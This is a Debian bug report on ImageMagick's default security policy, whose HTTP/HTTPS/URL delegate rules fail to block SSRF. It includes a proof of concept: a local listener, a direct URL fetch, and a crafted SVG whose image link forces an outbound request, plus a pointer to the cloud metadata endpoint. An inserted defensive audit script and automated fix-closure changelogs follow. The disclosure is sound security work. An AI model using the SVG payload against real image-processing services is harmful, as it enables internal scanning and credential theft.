#1140176 imagemagick: default policy.xml HTTP/HTTPS/URL delegate rules are no-ops (SSRF, CWE-918)

Package:
imagemagick
Source:
imagemagick
Description:
image manipulation programs -- binaries
Submitter:
Maram Sai Harsha Vardhan Reddy
Date:
2026-06-24 21:05:04 UTC
Severity:
normal
Tags:
#1140176#5
Date:
2026-06-16 20:15:32 UTC
Dear Maintainer,

The default ImageMagick security policy shipped by Debian in
debian/patches/0005-Add-a-debian-policy.patch
(installed as /etc/ImageMagick-7/policy.xml) attempts to block remote
HTTP/HTTPS/URL access -- the standard SSRF mitigation -- with these rules:

  <policy domain="delegate" rights="none" pattern="URL" />
  <policy domain="delegate" rights="none" pattern="HTTPS" />
  <policy domain="delegate" rights="none" pattern="HTTP" />

These rules are silently ineffective, so a default install still performs
outbound HTTP/HTTPS requests and is vulnerable to SSRF (CWE-918).

Root cause
----------
The http:/https: coders fetch URLs by invoking delegates named
"http:decode" / "https:decode" (coders/url.c). InvokeDelegate()
(MagickCore/delegate.c) enforces the "delegate" policy by glob-matching
the policy pattern against that full identifier string. The pattern
"HTTP" (no wildcards) does not match the literal string "http:decode",
so the rule is treated as inapplicable and the default (allow) wins.
The patterns "HTTP", "HTTPS" and "URL" therefore never block the URL
coders.

The "@*" path rule in the same file is enforced through a different code
path and does work, which gives operators false confidence that the
HTTP/HTTPS/URL restriction is also working.

Proof of concept
----------------
All commands run against the unmodified, as-installed policy.xml.

1. Minimal listener:

   # listener.py -- run with: python3 listener.py
   import http.server, socketserver
   class H(http.server.BaseHTTPRequestHandler):
       def do_GET(s):
           print("SSRF:", s.path, flush=True)   # log the requested path
           s.send_response(200); s.end_headers()
           s.wfile.write(b"GIF89a;")            # minimal GIF header so the read "succeeds"
       def log_message(s, *a): pass             # keep stdout to the SSRF lines only
   socketserver.TCPServer(("127.0.0.1", 7777), H).serve_forever()

2. Confirm the restrictive policy is active (this is correctly blocked):

   echo x > /tmp/q.txt
   magick label:@/tmp/q.txt /tmp/q.png
   -> magick: attempt to perform an operation not allowed by the
      security policy `@/tmp/q.txt'

3. PoC 1 -- direct URL coder:

   magick http://127.0.0.1:7777/ssrf out.png
   -> listener logs: SSRF: /ssrf

4. PoC 2 -- SSRF via untrusted SVG (the realistic web-service vector):

   printf '%s' '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="10" height="10"><image xlink:href="http://127.0.0.1:7777/svg-ssrf" width="10" height="10"/></svg>' > evil.svg
   magick evil.svg out.png
   -> listener logs: SSRF: /svg-ssrf

Both requests are sent despite the delegate rights="none" rules.
Substituting a real internal target (e.g.
http://169.254.169.254/latest/meta-data/) demonstrates real impact.

Impact
------
A service that thumbnails or converts user-supplied SVG (or URL) input
with ImageMagick can be coerced into attacker-controlled server-side
requests to internal services or cloud metadata endpoints, enabling
credential theft and internal port/host scanning. The exposure is worse
because operators believe they are protected: they deployed a policy
that explicitly lists HTTP, HTTPS and URL as forbidden.

Suggested fix
-------------
Replace the ineffective delegate rules with the coder-domain form, which
is enforced and covers every remote scheme:

  <policy domain="coder" rights="none" pattern="{HTTP,HTTPS,FTP,FTPS,URL,MSL,MVG}" />

(keeping the existing @* path rule). Verify with:

  magick http://127.0.0.1:1/x x.png

which must be rejected by policy, not merely fail to connect.

Bastien Roucariès has already prepared a fix; a CVE request is in
progress. I am filing here at the request of the Debian Security Team so
the fix is tracked in the BTS.

Tested on imagemagick 8:7.1.2.15+dfsg1-2; applies generally to the
ImageMagick 7.x series.

Regards,
Maram Sai Harsha Vardhan Reddy
Security Researcher
maramsaiharsha24@gmail.com
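The root-cause and suggested-fix sections of the report above describe two things an operator wants to check for themselves: that a literal delegate pattern such as "HTTP" can never glob-match the "http:decode" identifier the URL coders use, and that a corrected coder-domain rule really denies the remote coders. The script below is an added example, not code from the bug report, from Debian's packaging or from ImageMagick. It models the policy glob test as case-insensitive fnmatch after expanding {a,b} alternation (an assumption; a literal pattern like "HTTP" fails to match "http:decode" under either case rule, so the conclusion does not depend on it), takes the delegate identifiers "http:decode"/"https:decode" from the report's description of coders/url.c, uses its own list of remote coder names, and assumes the Debian /etc/ImageMagick-*/policy.xml layout. The constructed policy excerpts embedded in it are the rules quoted in the report and the report's suggested replacement. The runtime check implements the report's verification step: the URL must be rejected by policy, not merely fail to connect.

```python
"""
Added example (not part of the bug report, of Debian's packaging or of
ImageMagick): audit a policy.xml for delegate rules that can never match the
"<scheme>:decode" identifier, confirm coder-domain denial of remote coders,
and classify a live 'magick http://127.0.0.1:1/x' run.

Assumptions (labelled again in comments): glob test modelled as
case-insensitive fnmatch with {a,b} expansion; delegate identifiers taken
from the report; CODER_MAGICKS, POLICY_PATHS and the output file are
this checker's own choices.
"""
import fnmatch
import glob
import re
import shutil
import subprocess
import xml.etree.ElementTree as ET

POLICY_PATHS = "/etc/ImageMagick-*/policy.xml"        # assumption: Debian layout
CODER_MAGICKS = ["HTTP", "HTTPS", "FTP", "URL"]       # remote coders this checker tracks
DELEGATE_IDS = ["http:decode", "https:decode"]        # per the report (coders/url.c)
POLICY_DENIED = re.compile(r"not allowed by the security policy")

# Constructed excerpts: the rules quoted in the report, and its suggested fix.
DEBIAN_DEFAULT_EXCERPT = """<policymap>
  <policy domain="path" rights="none" pattern="@*" />
  <policy domain="delegate" rights="none" pattern="URL" />
  <policy domain="delegate" rights="none" pattern="HTTPS" />
  <policy domain="delegate" rights="none" pattern="HTTP" />
</policymap>"""
FIXED_EXCERPT = """<policymap>
  <policy domain="path" rights="none" pattern="@*" />
  <policy domain="coder" rights="none" pattern="{HTTP,HTTPS,FTP,FTPS,URL,MSL,MVG}" />
</policymap>"""


def expand_braces(pattern):
    """Expand {a,b,c} alternation recursively; fnmatch handles *, ? and [...]."""
    m = re.search(r"\{([^{}]*)\}", pattern)
    if m is None:
        return [pattern]
    head, tail = pattern[:m.start()], pattern[m.end():]
    expanded = []
    for alt in m.group(1).split(","):
        expanded.extend(expand_braces(head + alt + tail))
    return expanded


def policy_matches(pattern, subject):
    """Model of the policy glob test (assumption: case-insensitive). A literal
    pattern such as "HTTP" cannot match "http:decode" under either case rule:
    no wildcard, no match, and the rule is silently inapplicable."""
    return any(fnmatch.fnmatchcase(subject.lower(), alt.lower())
               for alt in expand_braces(pattern))


def audit_policy(xml_text):
    """Findings for a policy.xml body: rights="none" delegate rules whose
    pattern matches no URL-coder delegate identifier, and remote coders that
    no coder-domain rule denies."""
    findings = []
    denied_coders = set()
    for pol in ET.fromstring(xml_text).iter("policy"):
        if pol.get("rights") != "none":
            continue
        pattern = pol.get("pattern", "")
        if pol.get("domain") == "delegate":
            if not any(policy_matches(pattern, d) for d in DELEGATE_IDS):
                findings.append(f'delegate rule pattern="{pattern}" matches no '
                                f'delegate identifier: it is a no-op')
        elif pol.get("domain") == "coder":
            denied_coders.update(c for c in CODER_MAGICKS if policy_matches(pattern, c))
    findings.extend(f"coder {c} is not denied by any coder-domain rule"
                    for c in CODER_MAGICKS if c not in denied_coders)
    return findings


def classify_magick_result(returncode, stderr):
    """The report's verification: the URL must be rejected by policy, not
    merely fail to connect. Separate the three possible outcomes."""
    if POLICY_DENIED.search(stderr):
        return "blocked-by-policy"
    if returncode == 0:
        return "fetched"                 # request went out and succeeded
    return "attempted-but-failed"        # e.g. connection refused: policy did not stop it


def check_installed_magick(url="http://127.0.0.1:1/x"):
    """Run magick against a closed local port and classify; None without magick."""
    if shutil.which("magick") is None:
        return None
    r = subprocess.run(["magick", url, "/tmp/policy-check.png"],
                       capture_output=True, text=True, timeout=30)
    return classify_magick_result(r.returncode, r.stderr)


if __name__ == "__main__":
    for path in glob.glob(POLICY_PATHS):
        print(path)
        with open(path, encoding="utf-8") as fh:
            for finding in audit_policy(fh.read()) or ["no findings"]:
                print("  ", finding)
    print("runtime check:", check_installed_magick())
```

Run it on the host being checked: the static audit prints one line per ineffective delegate rule and per remote coder that nothing denies, and the runtime check must report "blocked-by-policy"; "attempted-but-failed" means the binary tried to open the connection, which is exactly the failure mode the report describes.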

#1140176#10
Date:
2026-06-16 22:34:11 UTC
We believe that the bug you reported is fixed in the latest version of
imagemagick, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 1140176@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bastien Roucariès <rouca@debian.org> (supplier of updated imagemagick package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
Format: 1.8
Date: Tue, 16 Jun 2026 22:22:44 +0200
Source: imagemagick
Architecture: source
Version: 8:7.1.2.25+dfsg1-2
Distribution: unstable
Urgency: medium
Maintainer: ImageMagick Packaging Team <pkg-gmagick-im-team@lists.alioth.debian.org>
Changed-By: Bastien Roucariès <rouca@debian.org>
Closes: 1140176
Changes:
 imagemagick (8:7.1.2.25+dfsg1-2) unstable; urgency=medium
 .
   * Fix default ImageMagick policy configuration (Closes: #1140176)
Checksums-Sha1:
 f4f69a8df84d0b55426bc532db2e012723750f7a 5129 imagemagick_7.1.2.25+dfsg1-2.dsc
 ee66b21d708c7fb61d0f6aab145ad46ecc88299f 10539840 imagemagick_7.1.2.25+dfsg1.orig.tar.xz
 856f34f5e28b58b207df2d4551a181ee8e97e9f0 269108 imagemagick_7.1.2.25+dfsg1-2.debian.tar.xz
 06f120f1fe629824520eb8c4ecce315eb28cb454 8501 imagemagick_7.1.2.25+dfsg1-2_source.buildinfo
Checksums-Sha256:
 0bf4b4419374afb4b80e4ba2422a3e36a69438c9651c97dbab8e8acc3b60b888 5129 imagemagick_7.1.2.25+dfsg1-2.dsc
 f978ff8fc6fe47e70a66f8cc748d8aa6dab81fa97f14ac47ee5a464f22d68212 10539840 imagemagick_7.1.2.25+dfsg1.orig.tar.xz
 853c293b63200e01c525404143c52fe07856c3ed9f3fde4de6d6d057620844f3 269108 imagemagick_7.1.2.25+dfsg1-2.debian.tar.xz
 2608125f89fc2fcf82164965ce7c3dc88f97579341e93eca450ded033b0cd5ec 8501 imagemagick_7.1.2.25+dfsg1-2_source.buildinfo
Files:
 c04d2e4fd260cae67a62a4034f1793b6 5129 graphics optional imagemagick_7.1.2.25+dfsg1-2.dsc
 c870e0367efccd3649e52a78a168257a 10539840 graphics optional imagemagick_7.1.2.25+dfsg1.orig.tar.xz
 a164d5c0146905889d54bdd88ef5130c 269108 graphics optional imagemagick_7.1.2.25+dfsg1-2.debian.tar.xz
 e5e9d964f8bc7d602e15a9f151977acb 8501 graphics optional imagemagick_7.1.2.25+dfsg1-2_source.buildinfo

#1140176#15
Date:
2026-06-21 19:17:06 UTC
We believe that the bug you reported is fixed in the latest version of
imagemagick, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 1140176@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bastien Roucariès <rouca@debian.org> (supplier of updated imagemagick package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
Format: 1.8
Date: Sat, 20 Jun 2026 13:35:39 +0200
Source: imagemagick
Architecture: source
Version: 8:7.1.1.43+dfsg1-1+deb13u10
Distribution: trixie-security
Urgency: high
Maintainer: ImageMagick Packaging Team <pkg-gmagick-im-team@lists.alioth.debian.org>
Changed-By: Bastien Roucariès <rouca@debian.org>
Closes: 1140176
Changes:
 imagemagick (8:7.1.1.43+dfsg1-1+deb13u10) trixie-security; urgency=high
 .
   * Fix CVE-2026-48724:
     When using an image with a mask, the Floyd-Steinberg dithering
     method will cause a negative heap buffer over-write
   * Fix CVE-2026-48734:
     A crafted MVG file could result in a stack overflow due to a missing depth
     or visited-set check
   * Fix CVE-2026-48994:
     A missing check of a return value could lead to a heap buffer over-write in the MAT
     decoder on 32-bit systems.
   * Fix CVE-2026-49218:
     A missing check in the DCM decoder could result in an image with invalid dimensions,
     which could cause crashes in other operations.
   * Fix CVE-2026-49219:
     An incorrect parsing of the filename can result in a policy bypass and read files
     disallowed by a security policy using a symlink
   * Backport policy from 7.1.2.25
   * Fix CVE-2026-53460:
     A missing check for maximum memory request in AcquireAlignedMemory
     could trigger an out-of-memory condition.
   * Fix CVE-2026-53461:
     An incorrect loop in the ICON decoder can result in an out of
     bounds heap write resulting in a crash.
   * Fix CVE-2026-53463:
     When passing incorrect arguments in the distort operation a
     null pointer dereference will occur.
   * Fix CVE-2026-53464:
     When providing invalid options to the wand option parser
     a small memory leak will occur.
   * Harden debian policy in case of custom recompilation (Closes: #1140176)
Checksums-Sha1:
 623835326a9e19622ced44bd8b93caf9470fde17 5165 imagemagick_7.1.1.43+dfsg1-1+deb13u10.dsc
 103af0af388a733c043845b228cf3031c16d859b 10501740 imagemagick_7.1.1.43+dfsg1.orig.tar.xz
 f0272bcbc3f31e0312f9d104a6d4ecf555485515 346928 imagemagick_7.1.1.43+dfsg1-1+deb13u10.debian.tar.xz
 dbb9b98836b3b438e7ccd2cbd5d34e0ec5b04cb8 8537 imagemagick_7.1.1.43+dfsg1-1+deb13u10_source.buildinfo
Checksums-Sha256:
 a3b34ba2a422e93a219195a499ee67b306561f91683d7a77800d83157ed7f10d 5165 imagemagick_7.1.1.43+dfsg1-1+deb13u10.dsc
 bcb4f3c78a930a608fa4889f889edbcb384974246ad9407fce1858f2c0607bfe 10501740 imagemagick_7.1.1.43+dfsg1.orig.tar.xz
 8aee9cfdf22414d306fa1b027670f7a4ececc359164e92868b150f21e099d621 346928 imagemagick_7.1.1.43+dfsg1-1+deb13u10.debian.tar.xz
 f08aa361a89b882d1222aa920d45d1bf124ea073825c941c5f5e1c4786021021 8537 imagemagick_7.1.1.43+dfsg1-1+deb13u10_source.buildinfo
Files:
 fae1fc22e7e0345b6e7017c9d00b0101 5165 graphics optional imagemagick_7.1.1.43+dfsg1-1+deb13u10.dsc
 01cfb13a7c1813afb50790e431358c6c 10501740 graphics optional imagemagick_7.1.1.43+dfsg1.orig.tar.xz
 59618f1ae2ed16055eb4d998dc3b7590 346928 graphics optional imagemagick_7.1.1.43+dfsg1-1+deb13u10.debian.tar.xz
 3a439d3a552ce5cf68d54a3a98296237 8537 graphics optional imagemagick_7.1.1.43+dfsg1-1+deb13u10_source.buildinfo

#1140176#20
Date:
2026-06-24 21:02:59 UTC
We believe that the bug you reported is fixed in the latest version of
imagemagick, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 1140176@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bastien Roucariès <rouca@debian.org> (supplier of updated imagemagick package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
Format: 1.8
Date: Sun, 21 Jun 2026 15:40:05 +0200
Source: imagemagick
Architecture: source
Version: 8:6.9.11.60+dfsg-1.6+deb12u11
Distribution: bookworm-security
Urgency: high
Maintainer: ImageMagick Packaging Team <pkg-gmagick-im-team@lists.alioth.debian.org>
Changed-By: Bastien Roucariès <rouca@debian.org>
Closes: 1140176
Changes:
 imagemagick (8:6.9.11.60+dfsg-1.6+deb12u11) bookworm-security; urgency=high
 .
   * Fix CVE-2026-48733:
     An infinite loop in the subimage-search operation can happen
     when using a crafted image.
   * Fix CVE-2026-48734:
     A crafted MVG file could result in a stack overflow due to a missing depth
     or visited-set check
   * Fix CVE-2026-48994:
     A missing check of a return value could lead to a heap buffer over-write in the MAT
     decoder on 32-bit systems.
   * Fix CVE-2026-49218:
     A missing check in the DCM decoder could result in an image with invalid dimensions,
     which could cause crashes in other operations.
   * Fix CVE-2026-53460:
     A missing check for maximum memory request in AcquireAlignedMemory
     could trigger an out-of-memory condition.
   * Fix CVE-2026-53463:
     When passing incorrect arguments in the distort operation a
     null pointer dereference will occur.
   * Fix default policy.xml HTTP/HTTPS/URL delegate rules are no-ops
     (Closes: #1140176)
Checksums-Sha1:
 c3f16669cff11f4e0b18a0d86d3bfd20477243b3 5134 imagemagick_6.9.11.60+dfsg-1.6+deb12u11.dsc
 824a63dce5e54bd8b78077d671d8ab06300a8848 9395144 imagemagick_6.9.11.60+dfsg.orig.tar.xz
 3886314169eaaacb6cccab42640a3d03688f480d 337148 imagemagick_6.9.11.60+dfsg-1.6+deb12u11.debian.tar.xz
 752aa4d804c3efbab1be821483cf05cda548765c 8516 imagemagick_6.9.11.60+dfsg-1.6+deb12u11_source.buildinfo
Checksums-Sha256:
 bc7cfc2484b72d4791be7785a0a251c8d55508975f70d794bd14cee73d06caef 5134 imagemagick_6.9.11.60+dfsg-1.6+deb12u11.dsc
 472fb516df842ee9c819ed80099c188463b9e961303511c36ae24d0eaa8959c4 9395144 imagemagick_6.9.11.60+dfsg.orig.tar.xz
 7782105ca00f7a22dbc353b37b5da89414379545defce3986e0e1726631afd82 337148 imagemagick_6.9.11.60+dfsg-1.6+deb12u11.debian.tar.xz
 b37363b9b3877324003befe138e26b3bddc09c2fb41e4e0969893504b0d72142 8516 imagemagick_6.9.11.60+dfsg-1.6+deb12u11_source.buildinfo
Files:
 399311662b1e0251a24ec17ff9df279c 5134 graphics optional imagemagick_6.9.11.60+dfsg-1.6+deb12u11.dsc
 8b8f7b82bd1299cf30aa3c488c46a3cd 9395144 graphics optional imagemagick_6.9.11.60+dfsg.orig.tar.xz
 d36a95688c1ef54ade52609eafa870bb 337148 graphics optional imagemagick_6.9.11.60+dfsg-1.6+deb12u11.debian.tar.xz
 a3d8eeeab7895c18dcef5af365f63dc7 8516 graphics optional imagemagick_6.9.11.60+dfsg-1.6+deb12u11_source.buildinfo